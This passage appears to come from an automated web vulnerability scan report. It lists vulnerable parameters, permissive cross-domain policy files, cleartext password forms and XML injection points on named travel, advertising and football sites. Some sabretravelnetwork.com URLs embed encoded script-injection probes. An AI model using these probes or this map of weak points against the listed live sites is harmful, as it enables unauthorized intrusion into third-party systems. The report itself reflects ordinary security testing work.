4.319. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

4.320. https://www.hotelplanner.com/Accept/Reserve.cfm [supplierType parameter]

4.321. https://www.hotelplanner.com/Accept/Reserve.cfm [taxRate parameter]

4.322. http://www.hotwire.com/hotel/results.jsp [REST URL parameter 1]

4.323. http://www.igougo.com/WebResource.axd [d parameter]

4.324. http://www.igougo.com/WebResource.axd [name of an arbitrarily supplied request parameter]

4.325. http://www.igougo.com/WebResource.axd [t parameter]

4.326. http://www.igougo.com/traveldeals/ratefinder.aspx [REST URL parameter 1]

4.327. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

4.328. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

4.329. http://www.igougo.com/traveldeals/ratefinder.aspx [TypeID parameter]

4.330. http://www.igougo.com/traveldeals/ratefinder.aspx [adlt parameter]

4.331. http://www.igougo.com/traveldeals/ratefinder.aspx [dest parameter]

4.332. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

4.333. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

4.334. http://www.igougo.com/traveldeals/ratefinder.aspx [endDate parameter]

4.335. http://www.igougo.com/traveldeals/ratefinder.aspx [name of an arbitrarily supplied request parameter]

4.336. http://www.igougo.com/traveldeals/ratefinder.aspx [rm parameter]

4.337. http://www.igougo.com/traveldeals/ratefinder.aspx [strtDate parameter]

4.338. http://www.jscache.com/weimg [itype parameter]

4.339. http://www.luminate.com/widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/ [callback parameter]

4.340. http://www.luminate.com/widget/v3/metadata/ [callback parameter]

4.341. http://www.luminate.com/widget/v3/metadata/ [url parameter]

4.342. http://www.manutd.com/One-United/Login.aspx [redirectPath parameter]

4.343. http://www.manutd.com/Search-Results.aspx [catTxt parameter]

4.344. http://www.manutd.com/Search-Results.aspx [searchText parameter]

4.345. http://www.mufoundation.org/Search.aspx [search parameter]

4.346. http://www.mufoundation.org/Search.aspx [search parameter]

4.347. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.348. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.349. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.350. http://www.orbitz.com/App/SubmitQuickSearch [origin parameter]

4.351. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

4.352. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

4.353. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

4.354. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

4.355. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

4.356. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

4.357. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

4.358. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

4.359. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

4.360. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

4.361. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

4.362. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

4.363. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

4.364. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

4.365. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.366. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.367. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

4.368. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

4.369. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

4.370. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

4.371. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

4.372. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

4.373. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

4.374. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

4.375. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.376. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.377. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

4.378. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

4.379. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

4.380. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

4.381. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

4.382. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

4.383. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

4.384. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

4.385. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

4.386. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

4.387. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.388. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.389. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

4.390. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

4.391. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

4.392. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

4.393. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

4.394. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

4.395. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

4.396. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

4.397. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

4.398. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

4.399. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.400. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.401. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

4.402. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

4.403. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

4.404. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

4.405. http://www.travel-ticker.com/Destination/ [bid parameter]

4.406. http://www.travel-ticker.com/Destination/ [sid parameter]

4.407. http://www.travel-ticker.com/altcategory.jsp [bid parameter]

4.408. http://www.travel-ticker.com/altcategory.jsp [categoryName parameter]

4.409. http://www.travelocity.com/popWindow2 [dest parameter]

4.410. http://www.travelocity.com/popWindow2 [fromDate parameter]

4.411. http://www.travelocity.com/popWindow2 [fromMonth parameter]

4.412. http://www.travelocity.com/popWindow2 [fromYear parameter]

4.413. http://www.travelocity.com/popWindow2 [noOfAdults parameter]

4.414. http://www.travelocity.com/popWindow2 [toDate parameter]

4.415. http://www.travelocity.com/popWindow2 [toMonth parameter]

4.416. http://www.travelocity.com/popWindow2 [toYear parameter]

4.417. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [pubid parameter]

4.418. http://www9.effectivemeasure.net/v4/em_js [ns parameter]

4.419. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [Referer HTTP header]

4.420. http://www.turkishairlines.com/static/css/ui-lightness/jquery-ui-1.8.14.custom.css [Referer HTTP header]

4.421. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

4.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

4.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

4.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

4.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.429. http://www.travelocity.com/ [SID cookie]

4.430. http://www.travelocity.com/ [TVLY_GEO cookie]

4.431. http://www.travelocity.com/472a [SID cookie]

4.432. http://www.travelocity.com/472a [TVLY_GEO cookie]

4.433. http://www.travelocity.com/resolve/default [SID cookie]

4.434. http://www.travelocity.com/resolve/default [TVLY_GEO cookie]

4.435. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [drft cookie]

5. Flash cross-domain policy

5.1. http://a.collective-media.net/crossdomain.xml

5.2. http://ad-dc2.adtech.de/crossdomain.xml

5.3. http://ad.doubleclick.net/crossdomain.xml

5.4. http://ad.turn.com/crossdomain.xml

5.5. http://ad4.liverail.com/crossdomain.xml

5.6. http://ads.pointroll.com/crossdomain.xml

5.7. http://adserver.adtech.de/crossdomain.xml

5.8. http://aka-cdn-ns.adtech.de/crossdomain.xml

5.9. http://aperture.displaymarketplace.com/crossdomain.xml

5.10. http://b.scorecardresearch.com/crossdomain.xml

5.11. http://bcp.crwdcntrl.net/crossdomain.xml

5.12. http://beacon.securestudies.com/crossdomain.xml

5.13. http://c.betrad.com/crossdomain.xml

5.14. http://cacheserve.williamhill.com/crossdomain.xml

5.15. http://cas.criteo.com/crossdomain.xml

5.16. http://cdn.flashtalking.com/crossdomain.xml

5.17. http://cdn.turn.com/crossdomain.xml

5.18. http://d.tradex.openx.com/crossdomain.xml

5.19. http://dev.virtualearth.net/crossdomain.xml

5.20. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

5.21. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

5.22. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

5.23. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

5.24. http://ehg-twi.hitbox.com/crossdomain.xml

5.25. http://ff.connextra.com/crossdomain.xml

5.26. http://hits.guardian.co.uk/crossdomain.xml

5.27. http://ib.adnxs.com/crossdomain.xml

5.28. http://idpix.media6degrees.com/crossdomain.xml

5.29. http://js.revsci.net/crossdomain.xml

5.30. http://kantarmedia.guardian.co.uk/crossdomain.xml

5.31. http://l.betrad.com/crossdomain.xml

5.32. http://m.xp1.ru4.com/crossdomain.xml

5.33. http://media.fastclick.net/crossdomain.xml

5.34. http://oas.guardian.co.uk/crossdomain.xml

5.35. http://openx.px.invitemedia.com/crossdomain.xml

5.36. http://panel.kantarmedia.com/crossdomain.xml

5.37. http://pix04.revsci.net/crossdomain.xml

5.38. http://pixel.quantserve.com/crossdomain.xml

5.39. http://premiumtv.122.2o7.net/crossdomain.xml

5.40. http://r.turn.com/crossdomain.xml

5.41. http://rs.gwallet.com/crossdomain.xml

5.42. http://s0.2mdn.net/crossdomain.xml

5.43. http://secure-uk.imrworldwide.com/crossdomain.xml

5.44. https://secure.mlb.com/crossdomain.xml

5.45. http://serve.williamhill.com/crossdomain.xml

5.46. http://servedby.flashtalking.com/crossdomain.xml

5.47. http://speed.pointroll.com/crossdomain.xml

5.48. http://stat.flashtalking.com/crossdomain.xml

5.49. http://sync.mathtag.com/crossdomain.xml

5.50. http://tags.bluekai.com/crossdomain.xml

5.51. http://vox-static.liverail.com/crossdomain.xml

5.52. http://www.luminate.com/crossdomain.xml

5.53. http://www.manutd.com/crossdomain.xml

5.54. http://www.premierleague.com/crossdomain.xml

5.55. http://www9.effectivemeasure.net/crossdomain.xml

5.56. http://xml.eplayer.performgroup.com/crossdomain.xml

5.57. http://xml.premierleague.com/crossdomain.xml

5.58. http://adadvisor.net/crossdomain.xml

5.59. http://cookex.amp.yahoo.com/crossdomain.xml

5.60. http://googleads.g.doubleclick.net/crossdomain.xml

5.61. http://optimized-by.rubiconproject.com/crossdomain.xml

5.62. http://resource.guim.co.uk/crossdomain.xml

5.63. http://www.goal.com/crossdomain.xml

5.64. http://www.guardian.co.uk/crossdomain.xml

5.65. http://matcher-cwb.bidder7.mookie1.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad4.liverail.com/clientaccesspolicy.xml

6.3. http://ads.pointroll.com/clientaccesspolicy.xml

6.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.5. http://beacon.securestudies.com/clientaccesspolicy.xml

6.6. http://dev.virtualearth.net/clientaccesspolicy.xml

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

6.11. http://hits.guardian.co.uk/clientaccesspolicy.xml

6.12. http://pixel.quantserve.com/clientaccesspolicy.xml

6.13. http://premiumtv.122.2o7.net/clientaccesspolicy.xml

6.14. http://s0.2mdn.net/clientaccesspolicy.xml

6.15. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml

6.16. http://speed.pointroll.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

7.2. http://www.hotelplanner.com/Search/Index.cfm

7.3. http://www.manutd.com/

7.4. http://www.manutd.com/One-United/Login.aspx

7.5. http://www.manutd.com/One-United/Login.aspx

7.6. http://www.manutd.com/Search-Results.aspx

7.7. http://www.manutd.com/en.aspx

7.8. http://www.manutd.com/en/Club/Sponsors.aspx

7.9. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

7.10. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

7.11. http://www.manutd.com/en/One-United.aspx

7.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

8. XML injection

8.1. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 1]

8.2. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 2]

8.3. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 1]

8.4. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 2]

8.5. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 3]

8.6. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 4]

8.7. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 1]

8.8. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 2]

8.9. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 3]

8.10. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 4]

8.11. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 5]

8.12. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 1]

8.13. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 2]

8.14. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 3]

8.15. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 4]

8.16. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 5]

8.17. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 6]

8.18. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 1]

8.19. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 2]

8.20. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 3]

8.21. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 4]

8.22. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 5]

8.23. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 6]

8.24. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 1]

8.25. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 2]

8.26. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 3]

8.27. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 4]

8.28. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 5]

8.29. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 1]

8.30. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 2]

8.31. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 3]

8.32. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 4]

8.33. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 5]

8.34. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 6]

8.35. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 1]

8.36. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 2]

8.37. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 3]

8.38. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 4]

8.39. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 5]

8.40. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 6]

8.41. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 1]

8.42. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 2]

8.43. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 3]

8.44. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 4]

8.45. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 1]

8.46. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 2]

8.47. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 3]

8.48. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 4]

8.49. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 1]

8.50. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 2]

8.51. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 3]

8.52. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 4]

8.53. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 1]

8.54. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 2]

8.55. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 3]

8.56. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 4]

8.57. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 5]

8.58. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 1]

8.59. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 2]

8.60. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 3]

8.61. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 4]

8.62. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 5]

8.63. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 1]

8.64. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 2]

8.65. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 3]

8.66. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 4]

8.67. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 1]

8.68. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 2]

8.69. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 3]

8.70. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 4]

8.71. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 5]

8.72. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 1]

8.73. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 2]

8.74. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 3]

8.75. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 4]

8.76. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 5]

8.77. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 1]

8.78. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 2]

8.79. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 3]

8.80. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 4]

8.81. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 5]

8.82. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 1]

8.83. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 2]

8.84. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 3]

8.85. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 4]

8.86. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 5]

8.87. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 1]

8.88. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 2]

8.89. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 3]

8.90. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 4]

8.91. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 5]

8.92. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 1]

8.93. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 2]

8.94. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 3]

8.95. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 4]

8.96. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 5]

8.97. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 1]

8.98. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 2]

8.99. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 3]

8.100. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 4]

8.101. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 5]

8.102. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 1]

8.103. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 2]

8.104. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 3]

8.105. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 4]

8.106. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 5]

8.107. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 1]

